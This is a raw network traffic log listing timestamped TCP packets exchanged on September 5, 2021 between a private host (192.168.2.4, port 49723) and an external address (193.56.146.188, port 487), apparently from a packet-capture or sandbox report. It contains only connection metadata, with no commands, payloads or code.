Sep 5, 2021 15:50:11.692157984 CEST	49723	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:11.692202091 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:11.692203045 CEST	49723	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:11.692251921 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:11.692260027 CEST	49723	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:11.692306995 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:11.692310095 CEST	49723	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:11.692359924 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:11.692367077 CEST	49723	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:11.692414999 CEST	49723	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:11.692416906 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:11.692471027 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:11.692471027 CEST	49723	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:11.692523956 CEST	49723	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:11.692528009 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:11.692579031 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:11.692588091 CEST	49723	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:11.692634106 CEST	49723	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:11.692634106 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:11.692683935 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:11.692694902 CEST	49723	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:11.692740917 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:11.692749023 CEST	49723	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:11.692795992 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:11.692797899 CEST	49723	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:11.692846060 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:11.692872047 CEST	49723	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:11.692888975 CEST	49723	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:11.692898035 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:11.692945957 CEST	49723	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:11.692953110 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:11.693002939 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:11.693008900 CEST	49723	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:11.693057060 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:11.693058014 CEST	49723	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:11.693109035 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:11.693111897 CEST	49723	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:11.693159103 CEST	49723	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:11.693164110 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:11.693212986 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:11.693236113 CEST	49723	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:11.693258047 CEST	49723	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:11.693267107 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:11.693311930 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:11.693331003 CEST	49723	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:11.693372965 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:11.693373919 CEST	49723	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:11.693424940 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:11.693448067 CEST	49723	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:11.693465948 CEST	49723	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:11.693478107 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:11.693528891 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:11.693531990 CEST	49723	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:11.693583012 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:11.693584919 CEST	49723	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:11.693633080 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:11.693672895 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:11.693686008 CEST	49723	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:11.693726063 CEST	49723	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:11.693731070 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:11.693783998 CEST	49723	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:11.693788052 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:11.693844080 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:11.693845987 CEST	49723	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:11.693897009 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:11.693898916 CEST	49723	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:11.693952084 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:11.693952084 CEST	49723	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:11.694005013 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:11.694006920 CEST	49723	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:11.694057941 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:11.694065094 CEST	49723	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:11.694109917 CEST	49723	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:11.694113970 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:11.694164991 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:11.694170952 CEST	49723	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:11.694217920 CEST	49723	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:11.694225073 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:11.694276094 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:11.694279909 CEST	49723	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:11.694329023 CEST	49723	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:11.694331884 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:11.694379091 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:11.694397926 CEST	49723	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:11.694428921 CEST	49723	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:11.694432020 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:11.694479942 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:11.694485903 CEST	49723	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:11.694531918 CEST	49723	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:11.694535971 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:11.694585085 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:11.694602966 CEST	49723	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:11.694633961 CEST	49723	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:11.694645882 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:11.694700956 CEST	49723	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:11.694705963 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:11.694757938 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:11.694760084 CEST	49723	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:11.694809914 CEST	49723	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:11.694813013 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:11.694864988 CEST	49723	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:11.694865942 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:11.694919109 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:11.694925070 CEST	49723	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:11.694972038 CEST	49723	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:11.694973946 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:11.695028067 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:11.695034027 CEST	49723	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:11.695081949 CEST	49723	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:11.695090055 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:11.695149899 CEST	49723	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:11.695173979 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:11.695219994 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:11.695251942 CEST	49723	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:11.695269108 CEST	49723	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:11.695271969 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:11.695327997 CEST	49723	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:11.695328951 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:11.695382118 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:11.695386887 CEST	49723	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:11.695432901 CEST	49723	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:11.695441961 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:11.695492983 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:11.695494890 CEST	49723	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:11.695548058 CEST	49723	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:11.695548058 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:11.695600033 CEST	49723	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:11.695602894 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:11.695657969 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:11.695661068 CEST	49723	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:11.695707083 CEST	49723	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:11.695713043 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:11.695763111 CEST	49723	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:11.695771933 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:11.695821047 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:11.695827007 CEST	49723	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:11.695871115 CEST	49723	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:11.695882082 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:11.695930958 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:11.695934057 CEST	49723	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:11.695982933 CEST	49723	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:11.695986032 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:11.696038961 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:11.696041107 CEST	49723	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:11.696093082 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:11.696100950 CEST	49723	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:11.696149111 CEST	49723	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:11.696149111 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:11.696202993 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:11.696204901 CEST	49723	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:11.696255922 CEST	49723	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:11.696258068 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:11.696315050 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:11.696316957 CEST	49723	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:11.696371078 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:11.696378946 CEST	49723	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:11.696424961 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:11.696425915 CEST	49723	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:11.696475983 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:11.696487904 CEST	49723	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:11.696532965 CEST	49723	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:11.696533918 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:11.696583986 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:11.696592093 CEST	49723	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:11.696635008 CEST	49723	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:11.696641922 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:11.696691036 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:11.696697950 CEST	49723	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:11.696747065 CEST	49723	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:11.696752071 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:11.696805000 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:11.696810007 CEST	49723	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:11.696856022 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:11.696871996 CEST	49723	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:11.696913004 CEST	49723	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:11.696913958 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:11.696965933 CEST	49723	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:11.696968079 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:11.697021008 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:11.697021008 CEST	49723	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:11.697072983 CEST	49723	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:11.766509056 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:11.766571045 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:11.766616106 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:11.766633987 CEST	49723	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:11.766659975 CEST	49723	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:11.766668081 CEST	49723	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:11.766670942 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:11.766727924 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:11.766746044 CEST	49723	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:11.766788006 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:11.766797066 CEST	49723	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:11.766851902 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:11.766864061 CEST	49723	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:11.766910076 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:11.766917944 CEST	49723	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:11.766962051 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:11.766966105 CEST	49723	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:11.767019033 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:11.767030954 CEST	49723	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:11.767076015 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:11.767081976 CEST	49723	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:11.767137051 CEST	49723	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:11.767163992 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:11.767203093 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:11.767221928 CEST	49723	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:11.767260075 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:11.767261028 CEST	49723	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:11.767328024 CEST	49723	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:11.768779993 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:11.768817902 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:11.768846035 CEST	49723	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:11.768878937 CEST	49723	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:11.768878937 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:11.768939018 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:11.768939018 CEST	49723	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:11.768995047 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:11.769002914 CEST	49723	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:11.769052029 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:11.769062042 CEST	49723	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:11.769112110 CEST	49723	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:11.769324064 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:11.769361973 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:11.769402981 CEST	49723	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:11.769407988 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:11.769422054 CEST	49723	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:11.769465923 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:11.769475937 CEST	49723	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:11.769521952 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:11.769529104 CEST	49723	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:11.769582033 CEST	49723	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:11.769583941 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:11.769638062 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:11.769643068 CEST	49723	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:11.769691944 CEST	49723	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:11.769692898 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:11.769745111 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:11.769752979 CEST	49723	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:11.769799948 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:11.769804955 CEST	49723	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:11.769855022 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:11.769860983 CEST	49723	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:11.769911051 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:11.769911051 CEST	49723	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:11.769962072 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:11.769969940 CEST	49723	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:11.770020008 CEST	49723	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:11.770025015 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:11.770073891 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:11.770091057 CEST	49723	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:11.770128012 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:11.770136118 CEST	49723	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:11.770181894 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:11.770189047 CEST	49723	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:11.770237923 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:11.770240068 CEST	49723	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:11.770291090 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:11.770293951 CEST	49723	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:11.770347118 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:11.770349979 CEST	49723	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:11.770401001 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:11.770407915 CEST	49723	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:11.770459890 CEST	49723	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:11.770461082 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:11.770510912 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:11.770519972 CEST	49723	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:11.770565033 CEST	49723	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:11.838570118 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:11.838628054 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:11.838668108 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:11.838706017 CEST	49723	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:11.838720083 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:11.838732004 CEST	49723	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:11.838741064 CEST	49723	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:11.838777065 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:11.838820934 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:11.838856936 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:11.838886023 CEST	49723	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:11.838918924 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:11.838949919 CEST	49723	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:11.838968992 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:11.838978052 CEST	49723	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:11.839020967 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:11.839061975 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:11.839068890 CEST	49723	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:11.839126110 CEST	49723	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:11.839140892 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:11.839186907 CEST	49723	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:11.839217901 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:11.839257956 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:11.839276075 CEST	49723	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:11.839313030 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:11.839355946 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:11.839370966 CEST	49723	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:11.839416981 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:11.839459896 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:11.839476109 CEST	49723	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:11.839514017 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:11.839555025 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:11.839570999 CEST	49723	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:11.839608908 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:11.839648962 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:11.839665890 CEST	49723	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:11.839704037 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:11.839744091 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:11.839759111 CEST	49723	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:11.839804888 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:11.839847088 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:11.839858055 CEST	49723	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:11.839900017 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:11.839939117 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:11.839979887 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:11.839986086 CEST	49723	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:11.840033054 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:11.840038061 CEST	49723	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:11.840084076 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:11.840123892 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:11.840141058 CEST	49723	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:11.881267071 CEST	49723	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:11.909678936 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:11.909733057 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:11.909770012 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:11.909811974 CEST	49723	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:11.909821033 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:11.909877062 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:11.909881115 CEST	49723	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:11.909929037 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:11.909966946 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:11.909982920 CEST	49723	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:11.910021067 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:11.910072088 CEST	487	49723	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:11.910093069 CEST	49723	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:11.910130978 CEST	487	49723	193.56.146.188	192.168.2.4
